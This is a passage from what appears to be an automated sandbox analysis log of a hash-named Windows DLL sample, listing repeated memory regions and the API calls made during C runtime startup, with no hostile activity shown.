= pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3426 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3427 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3428 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3429 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3430 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3431 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3432 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3433 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3435 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3436 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3437 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3438 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3439 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3440 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3441 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3442 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3443 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3444 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3445 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3446 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3447 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3448 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3449 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3450 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3451 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3452 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3453 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3454 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3455 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3456 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3457 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3458 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3459 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3460 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3461 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3462 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3463 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3464 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3465 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3466 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3467 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3468 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3469 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3470 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3471 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3472 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3473 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3474 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3475 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3476 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3477 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3478 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3479 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3480 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3482 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3483 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3484 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3485 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3486 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3487 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3488 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3489 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3490 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3491 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3492 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3493 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3494 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3495 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3496 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3497 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3498 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3499 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3500 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3501 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3502 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3503 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3504 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3505 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3506 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3507 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3508 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3509 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3510 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3511 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3512 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3513 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3514 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3515 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3516 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3517 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3518 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3519 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3520 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3521 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3522 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3523 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3524 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3525 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3529 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3530 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3531 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3532 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3533 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6451 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6452 start_va = 0x1b0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6460 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6461 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 42 os_tid = 0x115c [0117.651] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.651] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0117.652] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.652] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0117.652] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0117.652] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.652] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0117.653] GetProcessHeap () returned 0x470000 [0117.653] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.653] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0117.653] GetLastError () returned 0x7e [0117.653] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0117.653] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0117.654] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c8) returned 0x483b10 [0117.654] SetLastError (dwErrCode=0x7e) [0117.654] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1200) returned 0x483ee0 [0117.655] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0117.655] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0117.656] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.656] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress" [0117.656] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress" [0117.656] GetACP () returned 0x4e4 [0117.656] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x228) returned 0x474f20 [0117.656] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.656] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0117.656] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0117.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0117.656] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0117.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0117.656] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0117.656] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0117.657] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.657] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0117.657] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 